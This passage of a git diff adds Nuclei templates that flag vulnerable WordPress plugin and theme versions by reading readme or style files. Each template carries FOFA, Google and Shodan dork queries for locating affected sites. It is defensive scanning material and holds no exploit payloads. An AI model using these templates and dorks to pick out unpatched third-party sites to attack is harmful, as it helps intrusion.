https://www.wordfence.com/threat-intel/vulnerabilities/id/3823fedd-f5b9-420d-98b5-8b7bfc6b02de?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/echoza/" + google-query: inurl:"/wp-content/plugins/echoza/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,echoza,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/echoza/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "echoza" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.1.1') \ No newline at end of file diff --git a/poc/other/filester-568e78f1e3709813a32ee8f38f2cd07a.yaml b/poc/other/filester-568e78f1e3709813a32ee8f38f2cd07a.yaml new file mode 100644 index 0000000000..bd9488addf --- /dev/null +++ b/poc/other/filester-568e78f1e3709813a32ee8f38f2cd07a.yaml @@ -0,0 +1,59 @@ +id: filester-568e78f1e3709813a32ee8f38f2cd07a + +info: + name: > + File Manager Pro – Filester <= 1.8.6 - Missing Authorization to Authenticated (Subscriber+) Filebird Plugin Installation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b09bfff-4d6e-4de0-b6ab-6ac27c4f2be6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/filester/" + google-query: inurl:"/wp-content/plugins/filester/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,filester,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/filester/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "filester" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.6') \ No newline at end of file diff --git a/poc/other/gaga-lite-f2a32ddf27d02f7ada6388e3c4206c80.yaml b/poc/other/gaga-lite-f2a32ddf27d02f7ada6388e3c4206c80.yaml new file mode 100644 index 0000000000..6b9d6e87ba --- /dev/null +++ b/poc/other/gaga-lite-f2a32ddf27d02f7ada6388e3c4206c80.yaml @@ -0,0 +1,59 @@ +id: gaga-lite-f2a32ddf27d02f7ada6388e3c4206c80 + +info: + name: > + Multiple Themes - Authenticated (Subscriber+) Arbitrary Plugin Activation and Deactivation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b086aec-3af4-4498-bb7d-dd6f6d264be7?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/gaga-lite/" + google-query: inurl:"/wp-content/themes/gaga-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,gaga-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/gaga-lite/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gaga-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/other/grip-f2a32ddf27d02f7ada6388e3c4206c80.yaml b/poc/other/grip-f2a32ddf27d02f7ada6388e3c4206c80.yaml new file mode 100644 index 0000000000..fb86295157 --- /dev/null +++ b/poc/other/grip-f2a32ddf27d02f7ada6388e3c4206c80.yaml @@ -0,0 +1,59 @@ +id: grip-f2a32ddf27d02f7ada6388e3c4206c80 + +info: + name: > + Multiple Themes - Authenticated (Subscriber+) Arbitrary Plugin Activation and Deactivation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b086aec-3af4-4498-bb7d-dd6f6d264be7?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/grip/" + google-query: inurl:"/wp-content/themes/grip/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,grip,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/grip/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "grip" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.9') \ No newline at end of file diff --git a/poc/other/one-paze-f2a32ddf27d02f7ada6388e3c4206c80.yaml b/poc/other/one-paze-f2a32ddf27d02f7ada6388e3c4206c80.yaml new file mode 100644 index 0000000000..2a13127149 --- /dev/null +++ b/poc/other/one-paze-f2a32ddf27d02f7ada6388e3c4206c80.yaml @@ -0,0 +1,59 @@ +id: one-paze-f2a32ddf27d02f7ada6388e3c4206c80 + +info: + name: > + Multiple Themes - Authenticated (Subscriber+) Arbitrary Plugin Activation and Deactivation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b086aec-3af4-4498-bb7d-dd6f6d264be7?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/one-paze/" + google-query: inurl:"/wp-content/themes/one-paze/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,one-paze,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/one-paze/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "one-paze" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.8') \ No newline at end of file diff --git a/poc/other/philantro.yaml b/poc/other/philantro.yaml new file mode 100644 index 0000000000..3667c884e4 --- /dev/null +++ b/poc/other/philantro.yaml @@ -0,0 +1,59 @@ +id: philantro-29c5a7b9291bcb9f2b3f30ab18228044 + +info: + name: > + Philantro – Donations and Donor Management <= 5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0cd2ad77-c5de-470d-bc17-729233e4ab92?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/philantro/" + google-query: inurl:"/wp-content/plugins/philantro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,philantro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/philantro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "philantro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2') \ No newline at end of file diff --git a/poc/other/scancircle.yaml b/poc/other/scancircle.yaml new file mode 100644 index 0000000000..271eb07598 --- /dev/null +++ b/poc/other/scancircle.yaml @@ -0,0 +1,59 @@ +id: scancircle-7ee90db200c7a437ce72480a93db9e3d + +info: + name: > + ScanCircle <= 2.9.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/27cc6931-086c-43a5-965b-2a19f15bb356?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/scancircle/" + google-query: inurl:"/wp-content/plugins/scancircle/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,scancircle,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/scancircle/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "scancircle" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.2') \ No newline at end of file diff --git a/poc/other/simple-notification-afa7d78fbc3bbde326d4d78b8152b4bc.yaml b/poc/other/simple-notification-afa7d78fbc3bbde326d4d78b8152b4bc.yaml new file mode 100644 index 0000000000..ff65432b43 --- /dev/null +++ b/poc/other/simple-notification-afa7d78fbc3bbde326d4d78b8152b4bc.yaml @@ -0,0 +1,59 @@ +id: simple-notification-afa7d78fbc3bbde326d4d78b8152b4bc + +info: + name: > + Simple Notification <= 1.3 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8d6637f7-7035-4355-9c9d-193ea87c6e62?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/simple-notification/" + google-query: inurl:"/wp-content/plugins/simple-notification/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,simple-notification,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-notification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-notification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/other/simple-notification-fdd7ff26d7f63a7b2fa52cbfdc17c04a.yaml b/poc/other/simple-notification-fdd7ff26d7f63a7b2fa52cbfdc17c04a.yaml new file mode 100644 index 0000000000..1949ca06af --- /dev/null +++ b/poc/other/simple-notification-fdd7ff26d7f63a7b2fa52cbfdc17c04a.yaml @@ -0,0 +1,59 @@ +id: simple-notification-fdd7ff26d7f63a7b2fa52cbfdc17c04a + +info: + name: > + Simple Notification <= 1.3 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/191521ba-817e-4a7f-99df-3fe9cc1c5de3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/simple-notification/" + google-query: inurl:"/wp-content/plugins/simple-notification/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,simple-notification,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-notification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-notification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/other/so-widgets-bundle-180c430fc45a724a110d6335d32e96f4.yaml b/poc/other/so-widgets-bundle-180c430fc45a724a110d6335d32e96f4.yaml new file mode 100644 index 0000000000..111e0e9e64 --- /dev/null +++ b/poc/other/so-widgets-bundle-180c430fc45a724a110d6335d32e96f4.yaml @@ -0,0 +1,59 @@ +id: so-widgets-bundle-180c430fc45a724a110d6335d32e96f4 + +info: + name: > + SiteOrigin Widgets Bundle <= 1.64.0 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6864382e-7a45-413c-a80e-a5dd827fe6c7?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/so-widgets-bundle/" + google-query: inurl:"/wp-content/plugins/so-widgets-bundle/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,so-widgets-bundle,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "so-widgets-bundle" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.64.0') \ No newline at end of file diff --git a/poc/other/taeggie-feed.yaml b/poc/other/taeggie-feed.yaml new file mode 100644 index 0000000000..04ff43a1af --- /dev/null +++ b/poc/other/taeggie-feed.yaml @@ -0,0 +1,59 @@ +id: taeggie-feed-008b75688d8ae4824127311c231e062f + +info: + name: > + Taeggie Feed <= 0.1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/65d11459-5cad-4d8b-a81d-7f0dd4342a52?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/taeggie-feed/" + google-query: inurl:"/wp-content/plugins/taeggie-feed/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,taeggie-feed,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/taeggie-feed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "taeggie-feed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.1.9') \ No newline at end of file diff --git a/poc/other/tourmaster-a67429358d0ce99ecc6ba58dd169ed25.yaml b/poc/other/tourmaster-a67429358d0ce99ecc6ba58dd169ed25.yaml new file mode 100644 index 0000000000..aeddb2c8c8 --- /dev/null +++ b/poc/other/tourmaster-a67429358d0ce99ecc6ba58dd169ed25.yaml @@ -0,0 +1,59 @@ +id: tourmaster-a67429358d0ce99ecc6ba58dd169ed25 + +info: + name: > + Tour Master - Tour Booking, Travel, Hotel < 5.3.4 - Unauthenticated Stored Cross-Site Scripting via Room Booking + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/12b1b1b4-a62f-451e-a78d-c1d85202a4cf?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/tourmaster/" + google-query: inurl:"/wp-content/plugins/tourmaster/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,tourmaster,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tourmaster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tourmaster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 5.3.4') \ No newline at end of file diff --git a/poc/other/video-share-vod.yaml b/poc/other/video-share-vod.yaml new file mode 100644 index 0000000000..13edfd5dc2 --- /dev/null +++ b/poc/other/video-share-vod.yaml @@ -0,0 +1,59 @@ +id: video-share-vod-3dfab9cfd6eeddeace596849813fffea + +info: + name: > + Video Share VOD – Turnkey Video Site Builder Script <= 2.6.30 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b857e64c-a345-4ed3-b690-5b9d1a0cae15?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/video-share-vod/" + google-query: inurl:"/wp-content/plugins/video-share-vod/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,video-share-vod,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/video-share-vod/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "video-share-vod" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.30') \ No newline at end of file diff --git a/poc/other/virtual-hdm-for-taxservice-am-b72e78d8893ace58a96e70e16ec3b4d7.yaml b/poc/other/virtual-hdm-for-taxservice-am-b72e78d8893ace58a96e70e16ec3b4d7.yaml new file mode 100644 index 0000000000..fced0d3f3a --- /dev/null +++ b/poc/other/virtual-hdm-for-taxservice-am-b72e78d8893ace58a96e70e16ec3b4d7.yaml @@ -0,0 +1,59 @@ +id: virtual-hdm-for-taxservice-am-b72e78d8893ace58a96e70e16ec3b4d7 + +info: + name: > + TAX SERVICE Electronic HDM <= 1.1.2 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/970c7495-e43c-4606-8154-e2ac7d1c4816?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/virtual-hdm-for-taxservice-am/" + google-query: inurl:"/wp-content/plugins/virtual-hdm-for-taxservice-am/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,virtual-hdm-for-taxservice-am,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/virtual-hdm-for-taxservice-am/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "virtual-hdm-for-taxservice-am" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file diff --git a/poc/other/wedevs-project-manager-b583a50e24233331029e3cbee7dc09ae.yaml b/poc/other/wedevs-project-manager-b583a50e24233331029e3cbee7dc09ae.yaml new file mode 100644 index 0000000000..88a0a50372 --- /dev/null +++ b/poc/other/wedevs-project-manager-b583a50e24233331029e3cbee7dc09ae.yaml @@ -0,0 +1,59 @@ +id: wedevs-project-manager-b583a50e24233331029e3cbee7dc09ae + +info: + name: > + WP Project Manager <= 2.6.15 - Authenticated (Subscriber+) Sensitive Information Exposure via Project Task List REST API + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a21b7c40-2090-4262-9105-346db2325612?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wedevs-project-manager/" + google-query: inurl:"/wp-content/plugins/wedevs-project-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wedevs-project-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wedevs-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wedevs-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.15') \ No newline at end of file diff --git a/poc/other/woffice-2b39d74568e88403e75df623ca0d523c.yaml b/poc/other/woffice-2b39d74568e88403e75df623ca0d523c.yaml new file mode 100644 index 0000000000..3504b9427d --- /dev/null +++ b/poc/other/woffice-2b39d74568e88403e75df623ca0d523c.yaml @@ -0,0 +1,59 @@ +id: woffice-2b39d74568e88403e75df623ca0d523c + +info: + name: > + Woffice <= 5.4.14 - Unauthenticated Privilege Escalation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c64089a-929c-4a36-8aa8-61a5c9e8562b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/woffice/" + google-query: inurl:"/wp-content/themes/woffice/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,woffice,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/woffice/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woffice" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.4.14') \ No newline at end of file diff --git a/poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-028c8bf1a96949a8037d7ca57cb52eb5.yaml b/poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-028c8bf1a96949a8037d7ca57cb52eb5.yaml new file mode 100644 index 0000000000..9fe5b7e407 --- /dev/null +++ b/poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-028c8bf1a96949a8037d7ca57cb52eb5.yaml @@ -0,0 +1,59 @@ +id: blaze-online-eparcel-for-woocommerce-028c8bf1a96949a8037d7ca57cb52eb5 + +info: + name: > + Blaze Online eParcel for WooCommerce <= 1.3.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/da58f0d5-1608-4c45-89a5-bc5bd358263e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/blaze-online-eparcel-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/blaze-online-eparcel-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,blaze-online-eparcel-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blaze-online-eparcel-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blaze-online-eparcel-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.3') \ No newline at end of file diff --git a/poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-5a8844d4895daa0c0548d395338c8680.yaml b/poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-5a8844d4895daa0c0548d395338c8680.yaml new file mode 100644 index 0000000000..c91d8c117f --- /dev/null +++ b/poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-5a8844d4895daa0c0548d395338c8680.yaml @@ -0,0 +1,59 @@ +id: blaze-online-eparcel-for-woocommerce-5a8844d4895daa0c0548d395338c8680 + +info: + name: > + Blaze Online eParcel for WooCommerce <= 1.3.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eeca3208-2cab-4c03-935f-8f657d7ca87f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/blaze-online-eparcel-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/blaze-online-eparcel-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,blaze-online-eparcel-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blaze-online-eparcel-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blaze-online-eparcel-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.3') \ No newline at end of file diff --git a/poc/remote_code_execution/import-export-for-woocommerce-bcf2ad7e63917a98b59c548c5519a59f.yaml b/poc/remote_code_execution/import-export-for-woocommerce-bcf2ad7e63917a98b59c548c5519a59f.yaml new file mode 100644 index 0000000000..9f7b850e38 --- /dev/null +++ b/poc/remote_code_execution/import-export-for-woocommerce-bcf2ad7e63917a98b59c548c5519a59f.yaml @@ -0,0 +1,59 @@ +id: import-export-for-woocommerce-bcf2ad7e63917a98b59c548c5519a59f + +info: + name: > + Import Export For WooCommerce <= 1.5 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/afb5b791-0bc7-466f-87f6-f6c5ebed576b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/import-export-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/import-export-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,import-export-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/import-export-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "import-export-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file diff --git a/poc/sql/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml b/poc/sql/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml new file mode 100644 index 0000000000..f43546f837 --- /dev/null +++ b/poc/sql/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c + +info: + name: > + Broken Link Checker | Finder <= 2.5.0 - Authenticated (Author+) Blind Server-Side Request Forgery + author: topscoder + severity: low + description: > + The Broken Link Checker | Finder plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.5.0 via the 'moblc_check_link' function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa52034e-3d11-4be5-ab8b-8f7256be2a3e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-12121 + metadata: + fofa-query: "wp-content/plugins/broken-link-finder/" + google-query: inurl:"/wp-content/plugins/broken-link-finder/" + shodan-query: 'vuln:CVE-2024-12121' + tags: cve,wordpress,wp-plugin,broken-link-finder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/broken-link-finder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "broken-link-finder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.0') \ No newline at end of file diff --git a/poc/sql/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml b/poc/sql/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml new file mode 